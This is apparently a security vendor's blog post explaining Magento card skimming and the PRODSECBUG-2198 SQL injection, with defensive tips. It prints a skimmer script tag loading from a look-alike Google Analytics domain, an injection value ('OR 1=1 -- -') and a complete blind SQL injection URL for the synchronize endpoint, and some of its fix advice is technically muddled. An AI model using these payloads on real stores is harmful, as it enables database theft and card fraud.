How Does Magento Card Skimming Work & How to be safe?

Magento Card Skimming is the practice of illegally stealing credit/debit info by injecting malicious scripts called ‘skimmers’ on a Magento website. If you are an owner of a Magento-powered website then this article is for you. Here, we bring to you a good resource with all the necessary details revolving around Magento card skimming security issue.

In this article, we shall be discussing what Magento card skimming is and how it affects Magento websites (with proof of concept). Further, we shall learn some working tips on how you can immune your website from this issue. So, let’s jump right in.

Related article – What Are Magecart Attacks On Magento Store And How To Prevent Them

What is Magento card skimming?

Magento is a PHP-based open-source e-commerce platform. It is a self-hosted content management system currently owned by Adobe. An approximate 250,000+ websites use Magento to power their e-commerce website. Majority of these websites belong to US-based e-commerce giants. Thus, Magento has a heavy responsibility to secure customer experience.

Card skimming, on the other hand, is the practice of illegally copying information from credit cards and debit cards by a physical card skimming device. Here is how Magento and card skimming got associated with each other.

Magento card skimming is a form of web skimming in which hackers steal payment info on Magento through a third party script. This script enables them to steal crucial banking information such as owner’s name, credit card/debit card number, CVV number, and expiry date. Hackers, usually monetize this information by selling it in the black market.

About the PRODSECBUG-2198 Exploit

The PRODSECBUG-2198 issue was first reported on 9 November 2018 on Bugcrowd. Basically, PRODSECBUG-2198 is a vulnerable code that allows an SQL injection in Magento. This vulnerability allows an unauthenticated user to execute arbitrary code which can cause leakage of sensitive information.

Very soon the bug was marked as P1. P1 vulnerabilities, according to Bugcrowd, are those vulnerabilities which can cause a privilege escalation. Due to this, any user can elevate to administrator rights from a lower level of permission. Further, it allows remote code execution, financial theft, etc. The exploit targeted the following versions of Magento:

  • Magento Commerce < 1.14.4.1
  • Magento Open Source < 1.9.4.1
  • Magento < 2.1.17
  • Magento < 2.2.8
  • Magento < 2.3.1

Skimmer by the name of Google

In a very recent case of Magento skimming, we saw hackers using a fake google domain to steal payment details. In this attack, the malicious javascript was being loaded from a domain called – google-analytîcs.com or xn--google-analytcs-xpb.com.

If you would see carefully, it is a nameplay on original Google domains. Thus, this skimming attack uses phishing as a method to fetch sensitive payment info. The script looks something like this –

<script type="text/javascript" src="//google-analytîcs.com/www.[redacted].com/3f5cf4657d5d9.js"></script>

Further, this skimmer captures data by the use of loaded JavaScripts and document.getElementsByTagName. If there are no developer tools open, this skimmer transmits the stolen data to the fake Google domaingoogle-analytîcs.com or xn--google-analytcs-xpb.com.

However, it shows a weird behavior when there is a developers tool open on your website. It detects and stops midway the transmission process. Also, this behavior varies depending on the browser software you are using.

 

Magento Card Skimming: Proof of Concept

A proof of concept about this security vulnerability is mentioned as follows. It is written in Python and the main thing that causes Magento Card Skimming issue.

  • The code here basically creates a dummy browser session with some random URLs and session data. This is done using Browser class and a session acquiring function.
  • An object of Browser class with session details is passed to SQL injection class.
  • The SQL injection now adds some payload data to the session URL, creates a product and then fetches crucial details from the website’s database. The SQL injection payload can also be modified to gain privileged access to the backend data.
  • The attacker gains information about the user’s recent transactions and banking information.
POC Magento Card Skimming
POC Magento Card Skimming
POC Magento Card Skimming
POC Magento Card Skimming
POC Magento Card Skimming

Is your Magento website hacked? Drop us a message or chat with an Astra agent and, we will be happy to help 😊 Or skip all that and avail the immediate malware cleanup now!

How the exploit infects your Magento website?

Magento has a huge codebase of approximately 2 million PHP lines. This makes auditing and searching for the exploit a cumbersome task. However, when our team of ethical hackers checked upon the code, they narrowed down their targets on the codes responsible for ORM and DB management.

The areas where the bugs of Magento Card Skimming existed were:

1. In the prepareSQLCondition function

This public function is contained inside one of the main classes handling the database and can be located at

MagentoFrameworkDBAdapterPdoMysql

The function code is as follows:

POC breakdown Magento Card Skimming
POC breakdown Magento Card Skimming

Understanding the exploit

Let us now understand the working of the exploit by focusing our attention over the marked lines. In the line marked [1], a condition alias is associated to a pattern using $conditionKeyMap. This replaces every ‘?’ character inside the alias by a quoted version of the given value using _prepareQuotedSqlCondition() function in line number 33 based on the logic written in lines 30-35. Now consider the following code instance:

<?php

$db->prepareSqlCondition('username', ['regexp' => 'my_value']);

=> $conditionKeyMap['regexp'] = "{{fieldName}} REGEXP ?";

=> $query = "username REGEXP 'my_value'";

Now a problem arises when the “from” and “to” conditions are used in conjunction in line number 30. The logic in that code ensures that a field is contained withing a range. For better understanding, let’s see this code snippet:

<?php

$db->prepareSqlCondition('price', [

'from' => '100'

'to' => '1000'

]);

$query = "price >= '100' AND price <= '1000'";

As per execution logic, whenever both the conditions exist, first the “from” is handled and then “to” is handled. But a crucial mistake is made at line number 38. The query that “from” generates is used further for formatting.

Now that every “?” would be replaced by the given value, if a question mark occurs in the value for “from”, it will get replaced by a quoted version of the value assigned to “to”. In order to perform a valid SQL injection attack, the attacker can deploy the following exploit code:

<?php

$db->prepareSqlCondition(‘price’,[

‘from’ => ‘x?’

‘to’ => ‘ OR 1=1 -- -’

]);

-> $query = “price >= ‘x’ OR 1=1 -- -’’ AND price <= ’ OR 1=1 -- -’”

The mistake, despite being of minuscule scale can turn out to be very impactful. The astonishing fact is that this piece of code has been residing from Magento version 1.x.

Is your Magento website hacked? Drop us a message or chat with an Astra agent and, we will be happy to help 😊 Or skip all that and avail the immediate malware cleanup now!

2. In the execute function of Synchronize class

Another vulnerability was found in the execute function at the following location:

MagentoCatalogControllerProductFrontendActionSynchronize

The PHP source code where the security issue was revealed is as follows:

  1. <?php
  2. public function execute()
  3. {
  4. $resultJson = $this->jsonFactory->create();
  5. try {
  6. $productsData = $this->getRequest()->getParam(‘ids’,[]);
  7. $typeId = $this->getRequest()->getParam(‘type_id’,null);
  8. $this->synchronizer->syncActions($productsData, $typeId);
  9. } catch (Exception $e) {
  10. $resultsJson->setStatusHeader(
  11. ZendHttpResponse::STATUS_CODE_400,
  12. ZendHttpAbstractMessage::VERSION_11,
  13. ‘Bad Request’
  14. );
  15. }
  16. return $resultsJson->setData([]);

The call stack that eventually leads to the bug:

  1. <?php
  2. $productsData = $this->getRequest()->getParam('ids', []);
  3. $this->synchronizer->syncActions($productsData, $typeId);
  4. $collection->addFieldToFilter('product_id', $this->getProductIdsByActions($productsData));
  5. $this->_translateCondition($field, $condition);
  6. $this->_getConditionSql($this->getConnection()->quoteIdentifier($field), $condition);
  7. $this->getConnection()->prepareSqlCondition($fieldName, $condition);

This piece of vulnerable code exists from v2.2.0 of Magento. A sample URL that can cause this unauthenticated blind SQL injection associated with Magento Card Skimming is as follows:

  1. https://magento2website.com/catalog/product_frontend_action/synchronize?
  2. type_id=recently_products&
  3. ids[0][added_at]=&
  4. ids[0][product_id][from]=?&
  5. ids[0][product_id][to]=))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -

Now that information can be read from the database, the attacker can extract credentials for the administrator account and use them to access the backend. They may also sneak out banking and other financial details from the users database and transactions database. The attacker may use this information and conduct cybercrimes such as e-commerce frauds or phishing or even vishing.

The attacker may also host malware on your website which may be deterrent to your organization’s reputation in the e-commerce platform. Your website may get blacklisted by search engines which can lead to fall in organic traffic of your website.

How to protect your website from Magento Card Skimming?

Now that we have understood in detail the working of Magento Card Skimming, let us understand how we can protect it from such attacks in the future.

  1. Sanitizing prepareSqlInjection Function

    For removing the security bug in prepareSqlInjection function, the code must be written as:
    $query = $query . $this->_prepareQuotedSqlCondition($conditionKeyMap['to'], $to, $fieldName);
    A reference to the value passed using ‘this’ pointer will prevent the attacker to have direct access to the backend data. The use of a pointer variable also enables data abstraction and access to only an authorized function.

  2. Validation of Input Data

    The values that are being taken as input in any of the pages of your Magento-based website must be validated before passing it further for backend processing. The validation can be done using proper functions or appropriate logic. It must be foolproof. The website administrator must make it compulsory for the website developers to write codes that are secure and less vulnerable.

  3. Update to Secure

    All the plugins that are being used by your Magento-based website must be up-to-date to the latest version. This will ensure a secure experience for your customers and users. Hackers usually target websites that are running on old plugins and they can host malware which can slow down your website and blacklist your Magento website.

  4. Security Audit

    Do a thorough security audit of the site to make sure you don’t already have security loopholes in your website. Do a revision of all Magento users and delete anyone you don’t recognize. To uncover all the loopholes and coding vulnerabilities, you can get a professional VAPT(Vulnerability Assessment and Penetration Testing) done on your website.

  5. Report any security discrepancy

    If you find any traces of security breach in the user database or the database handling the transactions, contact the involved parties (the payment processor, the customers, and company stakeholders) to sort out this emergency out as soon as possible. Security breaches should not be left unattended.

  6. Be cautious about shared hosting security risks

    If your website is hosted using shared hosting, then you must purchase plans for backup and increased security. You, as a security administrator or website administrator must contact your hosting service provider and have a knowledge about other websites which are hosted on the shared hosting server. Do not risk your business’s online reputation by going for an economical option. A detailed discussion on shared security risks has already been done in a previous article of Astra blog. You can give it a read here.

  7. Data Encryption

    Encrypt the data that is being stored on your website database with a strong encryption mechanism. This will give a tough time to the attacker to break into the personal data of your users or your organization’s strategic information.

  8. Fix XSS attack paths

    Although, in this article, we are not discussing XSS since Magento’s payment gateway page are constructed using PHP-based forms, it is important that they use htmlspecialchars() function to prevent $_SERVER[“PHP_SELF”] attacks.

  9. Install a firewall

    Installing a web application firewall is another way to enhance your website’s security. Astra’s Firewall is a continuous monitoring system for your website. It identifies and blocks coming threats to your website 24*7. Moreover, it keeps evolving with each attempted attack and gets better configured for the next.

For more articles on Magento security issues, click here.

Found the article helpful? Do share with your friends on Facebook, Twitter, LinkedIn.

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Sourish Das

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close